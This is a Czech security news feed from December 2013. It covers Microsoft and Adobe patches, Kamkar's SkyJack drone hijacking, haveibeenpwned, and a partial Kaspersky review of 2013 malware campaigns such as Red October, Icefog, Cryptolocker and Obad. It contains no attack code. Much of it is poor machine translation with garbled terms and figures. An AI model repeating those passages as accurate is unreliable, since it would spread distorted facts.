Korupce GDI + aktualizace záplaty paměti zranitelnost CVE-2013-3906, které byly detekce jako Exploit.Win32.CVE-2013-3906.a . Viděli jsme, nízký počet variací ITW o zneužití této chyby zabezpečení jako chybně soubor TIFF, všechny svržení zadní vrátka, jako je Citadela, na BlackEnergy bot, PlugX, Taidoor, Janicab, Solar, a Hannoveru. Cílový profil a distribuce sada nástrojů souvislosti s těmito využívat pokusy naznačují širokou škálu pravděpodobných aktérů hrozeb, které dostal své ruce na to od července tohoto roku, a široký dosahující distribuční řetězec, který poskytl využívat po celém světě. S ohledem na různé použití a zdrojů, to jeden může nahradit CVE-2012-0158 jako součást cílených útoků z hlediska celkového objemu.
Následujte mě na Twitteru
Bulletin Internet Explorer opravuje sedm jiné zvýšení oprávnění a poškození paměti zranitelností, z nichž některý ovlivňuje Internet Explorer 6 v systému Windows XP SP 3 prostřednictvím aplikace Internet Explorer 11 v systému Windows Server 2012 R2 a Windows RT 8.1. Očekáváme, že využije pro některé z těchto chyb zabezpečení zahrnuté v komoditě využívat balení.
Konečně, existuje další kritické zranitelnosti v systému Windows Scripting Engine zatím další "použití po volný", který bohužel umožňuje vzdálené spuštění kódu přes všechny verze Windows venku a může být napadena prostřednictvím některého z běžných webových prohlížečů. Patch!
Tento příspěvek bude pravděpodobně třeba aktualizovat později dnes, ale do té doby, více o záplaty tento měsíc lze nalézt na stránkách společnosti Microsoft .
Adobe Bezpečnostní aktualizace prosinec 2013 - Upevňovací CVE-2013-5331 a další
11.12.2013 Zranitelnosti
Tento měsíc se společnosti Adobe realing opravy jak pro Flash Player a Shockwave.
V vulnerabilies pro Flash Player ovlivní všechny platformy a týkají dvou CVEs - CVE-2013-5331 a CVE-2013-5332, které oba umožňují vzdálené spuštění kódu. Eploitation z CVE-2013-5331 pomocí aplikace Microsoft Word jako pákový mechanismus byl pozorován v přírodě. Přestože Flash 11.6 představil click-to-Play pro sadu Office, uživatelé mohou být stále společensky konstruovány do chodu obsahu Flash v dokumentech sady Office. Ujistěte se, že použít tuto opravu ihned.
Druhý bulletin zabezpečení ovlivňuje Shockwave Player . Tato aktualizace opravuje CVE-2013-5333 a CVE-2013-5334, které oba mají maximální prioritu, neboť umožňují vzdálené spuštění kódu.
Útočníci doufají, že lidé budou čekat, až po prázdninách s platnými záplaty, když tam je méně personálu kolem. Patch nyní místo.
Google a spol. brojí proti špehování uživatelů
11.12.2013 Špionáž
Velké technologické firmy vyzvaly americkou vládu k přehodnocení stávající „sledovací politiky“.
Osm firem – Google, Apple, Facebook, Twitter, AOL, Microsoft, LinkedIn a Yahoo – spojilo své síly a pod hlavičkou nové organizace Reform Government Surveillance Group prosazují zásadní reformu amerického špionážního programu.
Skupina odeslala americkému prezidentovi a členům tamního Kongresu dopis, ve kterém vyjadřuje své znepokojení nad současnou mírou špehování internetových uživatelů, která podle nich zásadním způsobem podkopává lidskou svobodu.
„Chápeme, že stát musí chránit své občany. Vzhledem k nastalým skutečnostem však cítíme potřebu upozornit na nutnost zásadní reformy globálního špionážního programu,“ píše se v otevřeném dopisu, který skupina zveřejnila na svých stránkách.
Skupina upozorňuje na rostoucí vliv státu na úkor jednotlivce. Stále častěji prý dochází k porušování občanských práv zaručených americkou ústavou. „Dochází k porušování svobody, které si všichni tak ceníme. Nastal čas na změnu.“
Krok osmi technologických gigantů přichází v době, kdy už celým světem několik měsíců otřásá velký špehovací skandál amerických tajných služeb, jehož startovacím motorem byl whistleblower Edward Snowden, který se momentálně skrývá někde v Rusku.
Bývalý spolupracovník americké Národní bezpečnostní agentury (NSA) poskytl médiím velké množství informací o způsobech, jakými NSA narušovala soukromí mnoha lidí po celém světě – od odposlouchávání telefonních hovorů, přes sledování internetové komunikace až po zneužití mezikontinentálních optických kabelů.
Členové proreformní skupiny považují dosud zveřejněné informace za dostatečný důkaz chybějící kontroly nad americkým sledovacím programem. „Vládnímu shromažďování informací chybí jasné limity a větší transparentnost,“ řekl zakladatel Facebooku Mark Zuckerberg.
Některé z firem zapojených do proreformní iniciativy byly americkými úřady samy požádány o poskytnutí určitých dat o vybraných uživatelích. Své zapojení potvrdili Apple, Microsoft, Google, Yahoo a Facebook.
Společnosti žádaly vládu o povolení zveřejnit počet a povahu poskytnutých dat, aby se tak předešlo jakýmkoliv spekulacím. Zatím neúspěšně.
Doma upravené letouny mohou lovit drony
11.12.2013 IT
Bezpečnostní výzkumník uvolnil software, který umožňuje lovit bezpilotní letouny ve vzduchu.
Samy Kamkar, specialista na problematiku soukromí a bezpečnosti, uveřejnil na internetu software a technický návod na vytvoření či modifikaci bezpilotních letounů, které je změní ve vzdušné predátory. Řešení využívá rádiově řízenou quadcopteru Parrot AR Drone 2.0, populární bezpilotní helikoptéru se čtyřmi rotory.
Parrot 2.0 je produkt francouzského výrobce bezdrátových produktů, má zabudovaný bezdrátový řadič Wi-Fi, který umožňuje letoun dálkově ovládat z aplikací na mobilních platformách iOS a Android. Kamkarova verze nese navíc vestavný počítač Raspberry Pi s operačním systémem Linux a dva bezdrátové USB tranceivery s externími anténami. Chod dodatečné elektroniky zajišťuje lehká baterie s kapacitou 1000 mAh.
Z hlediska technického řešení je důležitý konkrétní typ prvního adaptéru Wi-Fi, kterým je Alfa AWUS036H s externí anténou. Jeho specifickou vlastností je schopnost běžet v módu sledování, díky kterému je možné monitorovat a vkládat vlastní pakety do cizích bezdrátových sítí, aniž by bylo nutné se k nim připojit. Kamkar na prezentaci uveřejněné na youtube předvedl svou aplikaci SkyJack, napsanou v jazyce Perl a spouštěnou na platformě Raspberry Pi. Ta pomocí monitorovacího módu adaptéru Alda dokáže ve vzduchu identifikovat cizí letouny Parrot AR (pomocí charakteristické adresy MAC). Ty následně pomocí programu Aircrack-ng dokáže zasíláním speciálních paketů odpojit od vlastníka a převzít jejich řízení.
Samy Kamkar je poměrně známá osobnost a počítačový expert, nechvalně proslul vypuštěním svého červa do MySpace v roce 2005, který společnost donutil dočasně vypnout servery, odměnou za co mu byl tříletý zákaz používat počítače. Od roku 2008 se zabývá bezpečnostním výzkumem, odhalováním bezpečnostních slabin, vytvořil Evercookie, takřka nesmazatelnou cookie jako ukázku možností sledování uživatelů (podle uniklých materiálů právě Evercookie využila NSA při sledování sítě Tor). V roce 2011 to byl právě Kamkar, který na čelní stránce Wall Street Journalu publikoval zjištění, že telefony iPhone neustále posílají souřadnice GPS i v případě, že lokační služba byla vypnuta.
Podle Kamkara jej myšlenka bezpilotního dravého letounu napadla nad zprávou o plánech Amazonu na dopravu balíčků pomocí bezpilotních letounů. Vzhledem k tomu, že již dnes soukromé společnosti provozují vlastní bezpilotní letouny, můžeme v budoucnu očekávat konflikty mezi letouny různých vlastníků a Kamarův koncept může mít mnohem větší dopad, než se nyní může zdát.
Microsoft v úterý vydá kritické opravy Windows, Office a IE
11.12.2013 Zranitelnosti
Celkový roční počet aktualizací bude o 28 % vyšší než loni. Microsoft minulý týden oznámil, že v rámci pravidelného aktualizačního druhého úterý v měsíci poskytne 11 aktualizací zabezpečení na opravu kritických chyb zabezpečení v systému Windows, aplikaci Internet Explorer (IE), sadě Office a serveru Exchange, včetně jedné, která by měla zabránit hojným útokům potvrzeným před měsícem.
S 11 aktualizacemi z 10. prosince dosáhne počet aktualizací společnosti Microsoft 106 za rok 2013, což vyrovnává rekord z roku 2010 a znamená 28% nárůst ve srovnání s rokem 2012.
Pět z aktualizací uvedených v upozornění na aktualizace má označení „kritická“, tedy nejvyšší stupeň na interním žebříčku Microsoftu, zbývajících šest mají označení „důležitá“, tedy o stupínek nižší.
„Ze všeho nejdříve je potřeba nainstalovat záplatu pro IE,“ řekl Andrew Storms, ředitel pro vývoj a provoz bezpečnostní společnosti CloudPassage se sídlem v San Francisku.
Kritická aktualizace IE se bude týkat všech aktuálně podporovaných verzí prohlížeče Microsoftu od stařičkého IE6 po nedávno vydaný IE11. Tato aktualizace mimo jiné znamená, že Microsoft v letošním roce svůj webový prohlížeč opravoval každý měsíc, zatímco do července loňského roku probíhaly aktualizace této aplikace s poloviční frekvencí, tedy jednou za dva měsíce.
Společnost bude muset podporovat hned šest verzí IE přinejmenším do dubna, kdy konečně odejde do důchodu IE6, který debutoval před více než 12 lety a který sklízí spíše posměch.
„To je daň za udržování zastaralého softwaru,“ konstatoval Storms. „Mám tím na mysli provozní náklady oddělení IT na správu a udržování hned několika verzí systému, ale stejně je na tom vlastně i Microsoft, který musí totéž dělat pro své zákazníky.“
Další důležitou aktualizaci bude záplata několika zranitelností v kombinaci verzí Windows a Office, která by měla zastavit pokračující útoky, které Microsoftu nahlásili výzkumníci společnosti McAfee na počátku listopadu. Microsoft vydal 5. listopadu informační zpravodaj zabezpečení, který hrozba popisuje a nabízí dočasnou opravu.
Další dvě kritické aktualizace se týkají systému Windows, zatímco poslední opravuje server Exchange, který je v podnicích hojně rozšířen jako hlavní poštovní server.
Storms zákazníkům doporučuje okamžitě nainstalovat důležité aktualizace systému Windows, s aktualizací pro Exhcange ale radí nespěchat.
Závažnost aktualizace serveru Exchange na jedné straně vyžaduje pozornost. Ale Storms zdůraznil, že rozhodnutí může být složitější, než se na první pohled zdá, protože oddělení IT se na konci roku raději do aktualizace e-mailových serverů nepouštějí.
„Riziko opravy a restartu serveru Exchange na konci roku jistě na poradách vyvolá žhavou debatu,“ řekl Storms, když odkázal na diskuse, které se strhnou při poradách o nutnosti aktualizací.
„Když budeme mít štěstí, zranitelnost Exchange bude v knihovnách Outside In od Oraclu a bude snáz opravitelná,“ dodal Storms.
Exchange využívá knihovny Outside In k zobrazení přiložených souborů místo jejich otvírání v aplikaci v cílovém počítači, jako je aplikace Microsoft Word. Microsoft tyto knihovny opravuje opakovaně, konkrétně letos dvakrát – naposledy v srpnu – a také dvakrát v roce 2012.
Aktualizace Outside In byla součástí sady oprav Oraclu v říjnu, takže je téměř jisté, že aktualizace pro Exchange bude řešit nejnovější chyby této sady knihoven. „S ohledem na způsob testování oprav v Microsoftu by to časově odpovídalo,“ souhlasil Storm.
Šest aktualizací označených jako důležité bude opravovat chyby zabezpečení v systému Windows, sadách Office 2010 a Office 2013, serveru SharePoint a serveru Visual Studio Team Foundation Server 2013.
Pokud nebudou provedeny, mohou kyberzločinci nakazit počítače malwarem, ukrást informace, získat další oprávnění, které jim umožní spustit nebezpečnější útoky, nebo obejít bezpečnostní prvky.
Společnost vydá aktualizace zabezpečení 10. prosince kolem 13:00 východního času, tedy zhruba v 19:00 středoevropského času.
Web ověří, zda e-mailová adresa není mezi ukradenými
8.12.2013 Bezpečnost
Server v současné době kombinuje seznam obsahující ukradených e-mailových adres v případech Adobe, Yahoo, Stratfor, Gawker a Sony. Jeho autor chce průběžně přidávat další seznamy, pokud dojde k dalším podobným krádežím dat.
Nový web umožňuje uživatelů internetu ověřit, zda jejich jména a hesla nebyla prozrazena v několika největších krádežích dat v posledních letech. Web, který je provozován na adrese haveibeenpwned.com, vytvořil australský softwarový architekt Troy Hunt. Lze na něm zadat a ověřit emailovou adresu proti databázím uživatelům, které unikly letos z Adobe Systems, Yahoo v roce 2012, Sony a Stratfor v roce 2011 a Gawkeru v roce 2010.
Krádež v Adobe byla odhalena v říjnu a je považována za největší známý únik uživatelských informací v historii internetu. Výsledkem incidentu byl únik přes 153 milionů záznamů, včetně e-mailových adres a nedostatečně zašifrovaných hesel uživatelů. Řada bezpečnostních oborníků vytvořila weby s podobnými funkcemi, které vyhledávají v databázi pocházející z firmy Adobe, ale Hunt se rozhodl podchytit v jedné databázi všechny podstatné krádeže z poslední doby.
Je to důležité i proto, že velké množství uživatelů zadává tytéž emailové adresy a hesla na více webech. Například v roce 2012 Hunt porovnal záznamy uniklé ze Sony a z Yahoo a zjistil, že 59 procent z uživatelů majících účte u obou společností mělo i shodná hesla.
Web haveibeenpwned.com ovšem ukládá pouze emailové adresy. Jak prozradil Hunt na svém blogu: „Hesla nejsou pro funkci databáze potřebná a upřímně, nechci ani za ně nést zodpovědnost. Celý web má sloužit pro upozornění na problém krádeží.“
Importování dat do databáze webu nebylo nijak jednoduché, samotná databáze Adobe obsahuje 153 milionů záznamů, Statfor téměř 860 000, Gawker přes 530 000, Yahoo 453 000 a Sony 37 000. Hunt ostatně věnoval část svého blogu velmi zajímavému popisu problematiky vytváření takto velké databáze. Použil pro ni cloud Microsoft Azure, původní implementace byla postavena na virtuálním stroji s Microsoft SQL serverem, který pro statistickou analýzu potřeboval 56 GB RAM.
Současná verze využívá NoSQL databázi Windows Azure Table Storage, kde se účtuje pouze spotřebované úložiště a počet databázových transakcí, nikoli – jak je na cloudech zvykem – podle spotřebované paměti a práce CPU. Cenová efektivita řešení je důležitá nejen pro současný provoz, ale i pro to, že autor hodlá ve sběru pokračovat nadále a je si jist, že díky budoucím únikům dat jeho databáze ještě výrazně poroste.
Bulletin Kaspersky Security 2013. Malware Evolution
8.12.2013 Zdroj: Kaspersky
Analýza
Obsah
Horní příběhy 2013
Nové "staré" cyber-špionáž kampaně
Cyber-žoldáci: nově vznikající trend
Hacktivism a úniky
Ransomware
Mobilní malware a App Store (v) bezpečnosti
Útoky zalévání otvory
Potřeba znovu navázat nejslabším článkem v bezpečnostním řetězci
Ochrana osobních údajů ztráta: Lavabit, Silent Circle, NSA a ztráta důvěry
Chyby a nulové dny
Vzestupy a pády cryptocurrencies - jak Bitcoins vládnout světu
Závěry a těšíme se: "2014, rok důvěry"
Opět, je na čase, abychom dodávat naše obvyklé retrospektivu klíčových událostí, které definovaly hrozeb v roce 2013. Začněme tím, že při pohledu zpět na to, co jsme si mysleli, že tvar rok dopředu, na základě trendů, které jsme zaznamenali v předchozím roce.
Cílené útoky a cyber-špionáž
Kupředu pochod "hacktivism"
Národ-stát-podporovaný kybernetické útoky
Použití nástrojů právních dozoru
Zataženo, malware
Chyby a využije
Cyber vydírání
Komu věříte?
Mac OS malware
Mobilní malware
Ty vole, kde je moje soukromí?
Pokud bychom se nyní zaměřují na světlech na 2013, můžete posoudit sami, jak dobře jsme udělali v předpovídání budoucnosti.
Horní příběhy 2013
Tady je náš výběru z nejlepších bezpečnostních příběhů roku 2013.
1.. Nové "staré" cyber-špionáž kampaně
V každém retrospektiva nejlepších příběhů 2013 můžete očekávat, že si o incidenty, ke kterým došlo v letošním roce. Ale to není tak jednoduché, při pohledu na cílených útoků. Často se stává, že kořeny útoku sahají v čase od okamžiku, kdy jsou zjištěny a jsou analyzovány a hlášeny. Možná si ještě vzpomínáte, například, že to bylo v případě Stuxnet - čím více jsme to analyzovali, dále zpět jsme museli umístit datum jeho původu. Je to pravda, i některé z hlavních cyber-špionážních kampaní, které jsme viděli v tomto roce.
Rudý říjen je cyber-špionáž kampaň, která zasáhla stovky obětí na celém světě - včetně diplomatických a vládních agentur, výzkumných institucí, energetických a jaderných skupin a obchodu a letecké organizace. Malware je vysoce sofistikovaný - mimo jiné, že obsahuje "režim vzkříšení", který umožňuje malware re-infikovat počítače. Kód je vysoce modulární, což umožňuje útočníkům vyladit kód jednoduše pro každou konkrétní cíl. Zajímavé je, že Red October ne jen sběr informací od tradičních koncových bodů, ale také z mobilních zařízení připojených k síti obětí - jasné uznání zločinci, že mobilní zařízení jsou základní součástí dnešního podnikatelského prostředí a obsahují cenné informace. Zveřejnili jsme výsledky naší analýzy v lednu 2013, ale je jasné, že kampaň se datuje do roku 2008.
Mapa RedOctober oběti
V únoru jsme zveřejnili naši analýzu MiniDuke, navržen tak, aby krást data z vládních agentur a výzkumných institucí. Naše analýza odkryla 59 vysoký profil obětí organizací ve 23 zemích, včetně Ukrajiny, Belgii, Portugalsku, Rumunsku, České republice, Irsku, Maďarsku a USA. Stejně jako mnoho cílených útoků, MiniDuke kombinované použití "Old School" sociálního inženýrství taktiky s sofistikovaných technik. Například, MiniDuke včetně první využívat schopen obejít sandbox Adobe Acrobat Reader. Navíc, dané koncové obdržel pokyny z příkazového a-řídicí server pomocí předem definovaných Twitter účty (a použít vyhledávání Google jako záchytná metoda).
Dozvěděli jsme se o vlně útoků v březnu daného cílových špičkových politiků a aktivistů v oblasti lidských práv v zemích SNS a východní Evropy. Útočníci použili nástroj pro vzdálenou správu TeamViewer ke kontrole počítačů svých obětí, takže provoz stal se známý jako "TeamSpy". Cílem útoků bylo shromáždit informace z napadených počítačů. I když není tak propracovaný jako Rudý říjen, NetTraveler a jiných kampaní, tato kampaň byla přesto úspěšná - což znamená, že ne všechny úspěšné cílené útoky je třeba vybudovat kód od nuly.
NetTraveler (také známý jako "NetFile"), které bylo oznámeno v červnu, je další hrozba, že v době objevu, dlouho byl aktivní - v tomto případě od roku 2004.
Tato kampaň byla navržena tak, aby krást data týkající se průzkumu vesmíru, nano-technologie, výrobu energie, jaderné energie, lasery, medicíny a telekomunikací. NetTraveler byl úspěšně použit ke kompromisu více než 350 organizací ve 40 zemích - včetně Mongolska, Ruska, Indie, Kazachstán, Kyrgyzstán, Čína, Tádžikistán, Jižní Koreji, Španělsku a Německu. Cíle byly ze státního a soukromého sektoru, organizací, která zahrnovala vládní agentury, ambasády, ropné a plynárenské společnosti, výzkumná střediska, vojenské dodavatele a aktivisty.
Pokud vaše organizace ještě nikdy utrpěl záchvat, je to snadné říct si, že "to se nestane, aby mě", nebo si představit, že většina toho, co jsme slyšeli o malware je jen humbuk. Je to snadné číst titulky a dospět k závěru, že cílené útoky jsou problémem jen pro velké organizace. Ale ne všechny útoky zahrnují vysoké cíle profilu, nebo které jsou zapojeny do "kritické infrastruktury" projektů. Po pravdě řečeno, každá organizace se může stát obětí. Každá organizace má údaje, které by mohly být v hodnotě až zločinci, nebo mohou být použity jako "odrazový můstek" pro dosažení dalších společností. Tento bod byl bohatě ilustrována útoky Winnti a Icefog.
V dubnu jsme zveřejnili zprávu o počítačové trestné činnosti skupiny "Winnti" . Tato skupina, aktivní od roku 2009, se zaměřuje na krádeže digitální certifikáty podepsané oprávněnými dodavateli softwaru, stejně jako krádeže (včetně krádeže zdrojového kódu pro on-line herních projektů) duševního vlastnictví. Trojan používá skupina je DLL knihovna sestaven pro 64-bitové prostředí Windows. Používá řádně podepsaný ovladač a funguje jako plně funkční Remote Tool pro správu - dává útočníkům plnou kontrolu nad ohrožení počítače. Celkově jsme zjistili, že více než 30 společností v online herním průmyslu padlo za oběť na činnosti skupiny - hlavně v jihovýchodní Asii, ale také vliv společnosti v Německu, USA, Japonsku, Číně, Rusku, Brazílii, Peru, Bělorusko a Velká Británie. Tato skupina je stále aktivní.
V Icefog útoky , které jsme vyhlásili v září (popsané v další části této zprávy) byly zaměřeny na dodavatelském řetězci, a stejně assensitive údaje v rámci cílové sítě, také shromáždil e-mailu a síťových pověření ke zdrojům mimo cílové sítě .
2. Cyber-žoldáci: nově vznikající trend
Na první pohled to, Icefog se zdá být cílený útok jako každý jiný. Je to cyber-špionáž kampaň, aktivní od roku 2011, se zaměřil především v Jižní Koreji, Tchaj-wanu a Japonska, ale také v USA, Evropě a Číně. Podobně útočníci používají e-maily spear-phishing - obsahují buď přílohy nebo odkazy na nebezpečné webové stránky - distribuovat malware na jejich oběti. Stejně jako u jakéhokoli takového útoku, je těžké s jistotou říci, kolik obětí tam byly, ale my jsme viděli několik desítek obětí se systémem Windows a více než 350 běží Mac OSX (většina Ty jsou v Číně).
Nicméně, tam jsou některé klíčové rozdíly z dalších útoků, které jsme diskutovali už. Za prvé, Icefog je součástí nově vznikající trend, který vidíme - útoky malých skupin počítačovými žoldáků, kteří provozují malé hit-and-run útoky. Za druhé, útočníci specificky zaměřené dodavatelského řetězce - jejich rádoby oběti patří vládní instituce, vojenské dodavatelé, námořní a konstrukci lodí skupiny, telekomunikační operátory, satelitní operátoři, průmyslové a high-tech podniků a hromadných sdělovacích prostředků. Za třetí, jejich kampaně spoléhají na zakázku cyber-špionáže nástroje pro Windows a Mac OS X a přímo ovládat napadených počítačů, a navíc k Icefog, jsme si všimli, že oni používají zadní vrátka a jiné škodlivé nástroje pro boční pohyb v cílových organizacích a pro exfiltrace dat.
Čínská skupina "Skryté Lynx", jehož činnosti byly hlášeny výzkumníků společnosti Symantec v září, spadají do stejné kategorie - "zbraně-pro-pronájem" provádění útoků na zakázku s použitím špičkových vlastní nástroje. Tato skupina byla zodpovědná za, mimo jiné, útok na Bit9 na začátku tohoto roku.
Do budoucna předpokládáme, že více z těchto skupin se bude jevit jako podzemní černý trh "APT" služeb se začíná objevovat.
3. Hacktivism a úniky
Krádež peněz - a to buď prostřednictvím přímého přístupu bankovních účtů nebo krádeže důvěrných dat - není jediným motivem narušení bezpečnosti. Oni mohou také být spuštěn jako forma politického nebo sociálního protestu, nebo podkopat pověst společnosti terčem. Faktem je, že Internet prostupuje téměř každý aspekt života dnes. Pro ty, kteří s příslušnými dovednostmi, může to být snazší zaútočit na vládní nebo obchodní webové stránky, než je koordinovat reálný protest či demonstrace.
Jednou ze zbraní volby pro ty, kteří mají hádky je DDoS (Distributed Denial of Service) útoku. Jeden z největších takových útoků v historii (někteří by řekli * * největší) byla zaměřena na SpamHaus v měsíci březen. Odhaduje se, že na jeho vrcholu, útok dosáhl propustnost 300gbps. Jedna organizace podezřelá z uvedení do říkalo Cyberbunker. Konflikt mezi touto organizací a SpamHaus se datuje do roku 2011, ale dosáhla vrcholu, když byl Cyberbunker na černou listinu SpamHaus několik týdnů před incidentem. Majitel Cyberbunker popřel odpovědnost, ale tvrdil, že je mluvčí pro ty, kteří za ním. Útok byl zahájen jistě někdo schopný generovat obrovské množství provozu. Ke zmírnění této, Spamhaus byla nucena přestěhovat se do CloudFlare, hostingové a poskytovatele služeb je známá odvádí velké DDoS útoky. Zatímco někteří "to je konec světa, jak ho známe" titulky by mohla nadhodnocené účinky této události, událost upozorňuje na dopad, který rozhodl útočník může mít.
Zatímco útok na SpamHaus se zdá být izolovaný incident, probíhající hacktivist činnosti podle skupin, kteří byli aktivní za nějakou dobu pokračoval v letošním roce. To zahrnuje "anonymní" skupiny. V letošním roce je to již přihlásila k odpovědnosti za útoky na americké ministerstvo spravedlnosti, MIT (Massachusetts Institute of Technology) a na webových stránkách jednotlivých vlád - včetně Polska, Řecka, Singapuru, Indonésii a Austrálii (poslední dva incidenty výměnu mezi Anonymous skupiny ve svých zemích). Skupina také tvrdí, že hacknutý wi-fi síť britského parlamentu během protestů na náměstí Parliament během prvního listopadového týdne.
Ti, kteří tvrdí, že je součástí "syrské elektronické armády" (stoupenci syrského prezidenta Bašár al-Assad) byly aktivní také v průběhu celého roku. V dubnu se přihlásila k odpovědnosti za hacking Twitter úvahu Associated Press a odesílání falešných zpravodajské tweet exploze v Bílém domě - který zničila 136000000000dolary mimo DOW. V červenci skupina ohrožena účty Gmail tří zaměstnanců Bílého domu a Twitter úvahu Thomson Reuters.
Je jasné, že naše závislost na technologii, spolu s obrovským výpočetním výkonem vestavěný do dnešních počítačů, znamená to, že jsme potenciálně zranitelný vůči útoku skupiny lidí s různými motivy. Takže je pravděpodobné, že uvidíme konec činnosti hacktivists nebo někdo jiný rozhodli zaútočit na organizace všeho druhu.
4. Ransomware
Metody používané zločinci, aby se peníze z jejich obětí nejsou vždy jemné. Programy "Ransomware" pracovat jako počítačový specifické útoku "denial-of-service" - blokují přístup k systému souborů počítače, anebo se šifrování datových souborů uložených v počítači. Modus operandi se může lišit. V oblastech, kde úroveň softwarového pirátství jsou vysoké, například, Ransomware trojské koně mohou tvrdit, že jsou identifikovány nelicencované software na počítače a poptávky platby oběti získat přístup k počítači. Jinde, že smysl se pop-up zprávy z policejních agentur, kteří tvrdí, že našli dětskou pornografii nebo jiný nelegální obsah na počítači a náročnými pokutu. V ostatních případech, není žádný trik vůbec - prostě šifrování dat a upozorní vás, že musíte zaplatit, aby bylo možné obnovit vaše data. To byl případ s Cryptolocker Trojan, které jsme analyzovali v říjnu.
Cryptolocker stáhne RSA veřejný klíč z jeho příkazu a ovládání (C2) serveru. Unikátní klíč je vytvořen pro každou novou oběť a jen autoři mají přístup k dešifrování klíče. Chcete-li se připojit k serveru C2, Cryptolocker používá algoritmus generace doménu, která produkty 1000 jedinečné názvy kandidátské domén každý den. Mezi zločinci dát své oběti pouze tři dny splatit - a posilují jejich poselství s děsivé tapety, který je varuje, že pokud nezaplatí včas, budou jejich data budou navždy pryč. Oni přijímají různé formy plateb, včetně Bitcoin. Mezi nejvíce postižené země jsou Velká Británie a USA, vzdáleně následuje Indie, Kanady a Austrálie.
V tomto případě je trochu problém, v odstranění škodlivého aplikace, nebo dokonce přestavět na infikovaný počítač. Ale údaje mohou být potenciálně navždy ztraceny. Někdy v minulosti, jsme byli schopni dešifrovat unesených dat. To však není vždy možné, v případě, že šifrování je velmi silná, jako u některých Gpcode variant. Je také pravda, ze Cryptolocker. To je důvod, proč je důležité, aby jednotlivci a podniky vždy provádět pravidelné zálohy. Pokud dojde ke ztrátě dat - z jakéhokoli důvodu - potíže nemá proměnit v katastrofu.
Cryptolocker nebyl jediný vydírání program, který dělal titulky v letošním roce. V červnu jsme viděli Android aplikace s názvem "Volání zdarma Aktualizace" - falešný anti-malware program navržen tak, aby vyděsit své oběti na placení peněz pro odstranění neexistující malware z přístroje. Po instalaci aplikace se pokusí získat administrátorská práva: to umožňuje zapnout Wi-Fi a 3G zapínat a vypínat, a zabraňuje oběti z pouhé odstranění aplikace. Instalační soubor je odstraněn poté, v roce trik, vyhnout se odhalení legitimní anti-malware program, který může být instalován. Aplikace předstírá identifikovat malware a vyzve oběť koupit licenci pro plnou verzi odstranit malware. Zatímco aplikace je prohlížení, zobrazí se varování, že malware se snaží ukrást pornografický obsah z telefonu.
5. Mobilní malware a App Store (v) bezpečnosti
Explozivní růst v oblasti mobilních malware, který začal v roce 2011 pokračoval v tomto roce. V současné době existuje více než 148.427 mobilních malware úpravy v 777 rodinách. Drtivá většina z nich, stejně jako v minulých letech, je zaměřen na Android - 98,05% z mobilního malwaru našel tento rok se zaměřuje na tuto platformu. Není se co divit. Tato platforma vítězí na všech frontách pro zločinci: to je široce používán, je snadné vytvořit pro a lidí, kteří používají zařízení se systémem Android jsou schopny stahovat programy (včetně malwaru) z místa, kde oni si vyberou. Tento poslední faktor je důležitý: zločinci jsou schopni využít skutečnost, že lidé stahovat aplikace z Google Play, od jiných trzích, nebo z jiných webových stránek. To je také to, co umožňuje zločinci vytvářet své vlastní falešné webové stránky, které maškaráda jako legitimní obchody. Z tohoto důvodu je nepravděpodobné, že by jakékoliv zpomalení vývoje škodlivých aplikací pro Android.
Malware cílení na mobilní zařízení odráží malware běžně vyskytují na infikovaných počítačů a notebooků - zadní vrátka, trojské koně a Trojan-Spies. Jedinou výjimkou je SMS-Trojan programy - kategorie exkluzivně pro smartphony.
Hrozba není jen roste objem. Jsme svědky zvýšené složitosti příliš. V červnu jsme analyzovali nejmodernější mobilní malware Trojan jsme viděli to-data, Trojan s názvem Obad . Tato hrozba je multi-funkční: to posílá zprávy na čísla se zvýšenou sazbou, stáhne a nainstaluje další malware, pomocí Bluetooth poslat sama s jinými zařízeními a na dálku provádí příkazy na konzoli. Tento Trojan je také velmi složitá. Kód je silně zatemnil a využívá tři dosud nepublikované zranitelnosti. V neposlední řadě z nich je ten, který umožňuje získat Trojan rozšířené oprávnění správce zařízení - aniž by to, že jsou uvedeny na zařízení jako jeden z programů, které má tato práva. Toto dělá to nemožný pro oběť jednoduše odstranit malware z přístroje. To také umožňuje Trojan zablokovat obrazovku. To dělá to pro více než 10 sekund, ale to je dost Trojan poslat sám (a další malware) do okolních zařízení - trik navržen tak, aby se zabránilo postiženého od vidění činnosti Trojana.
Obad také používá několik metod k šíření. Jsme již zmínili využití Bluetooth. Kromě toho, že se šíří falešný Play úložiště Google, prostřednictvím textových zpráv, e-mailů a přes přesměrování z popraskaných míst. Na vrcholu tohoto, je to také klesla o další mobilní Trojan - Opfake.
Mezi zločinci stojí za Obad jsou schopni ovládat Trojan pomocí předem definované řetězce v textových zpráv. Trojan lze provést několik akcí. včetně zasílání textových zpráv, ping zadaný zdroj, pracuje jako proxy server, připojení na zadanou adresu, stahování a instalaci zadaný soubor, odesílání seznam aplikací nainstalovaných v zařízení, zasílání informací na konkrétní aplikaci, posílání kontaktů oběti na serveru a provádění příkazů zadaných serveru.
Trojan sklizně data z přístroje a odešle ji na povel a-řídicí server - včetně MAC adresy zařízení, operační jména, čísla IMEI, zůstatku na účtu, místním časem a zda Trojan nebo ne byl schopen úspěšně získat práva správce zařízení. Všechna tato data jsou nahrané na Obad ovládání a-příkaz server: Trojan nejprve pokusí použít aktivní připojení k Internetu, a, je-li k dispozici žádné připojení, hledá pro blízké Wi-Fi připojení, které nevyžaduje ověření.
6.. Útoky zalévání otvory
Ty by mohly být obeznámeni s výrazem "drive-by download" a kopí-phishing. První z nich je, kde zločinci podívejte se na nejistých webových stránek a zasadit škodlivý skript do PHP kódu HTTP nebo na jednom z internetových stránek. Tento skript může přímo nainstalovat malware do počítače někoho, kdo navštěvuje stránky, nebo může použít IFRAME přesměrovat oběť na škodlivé stránky ovládaném zločinci. Ten je cílená forma phishingu, často se používá jako výchozí bod pro cílený útok. E-mail je zaměřena na konkrétní osobu v rámci cílové organizace, v naději, že budou klikněte na odkaz, nebo spustit přílohu, která se spouští kód útočníka a pomůže jim získat počáteční oporu ve společnosti.
